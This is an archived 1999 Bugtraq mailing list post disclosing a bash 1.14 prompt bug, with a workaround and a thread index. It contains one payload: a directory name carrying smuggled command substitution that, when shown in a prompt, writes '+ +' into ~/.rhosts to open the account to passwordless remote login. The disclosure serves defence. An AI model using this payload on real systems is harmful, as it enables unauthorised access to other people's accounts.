Bugtraq mailing list archives

Re: Bash Bug

From: achurch () DRAGONFIRE NET (Andy Church)
Date: Wed, 21 Apr 1999 20:39:48 EDT

Figured while everyone was working with bash, I might as well make this
one public(I apologize if this is old news, apparently it hasnt been fixed
if so).

If a user creates a directory with a command like

mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "

and someone cd's into said directory, either by accident, or whatever,
then it will cause it to actually execute.


     Just to clarify, this only happens if PS1 (the bash prompt) contains
\w or \W _and_ a prompt is displayed containing the bogus directory name.
This means unattended shell scripts are safe.  As a workaround, use `pwd`
in place of \w.

     Tested with bash 1.14 (it's the only one I have handy).

  --Andy Church
    achurch () dragonfire net
    http://achurch.dragonfire.net/

Current thread:

Re: Bash Bug Andy Church (Apr 21)
- Re: Bash Bug Guy Cohen (Apr 22)
  - WebShop advisory. Elaich Of Hhp (Apr 22)
  - cold fusion scanner hYP0[13/\r (Apr 22)
  - Re: Bash Bug Daniel Jacobowitz (Apr 22)
  - Final Call for Papers - CQRE [Secure] networking Detlef Hühnlein (Apr 23)
  - Ffingerd privacy issues Eilon Gishri (Apr 23)
    - Re: Ffingerd privacy issues Felix von Leitner (Apr 23)
    - Re: Ffingerd privacy issues Eilon Gishri (Apr 23)
    - Re: Ffingerd privacy issues Dagmar d'Surreal (Apr 23)
- Re: Bash Bug Ph. Rueegsegger (Apr 23)

(Thread continues...)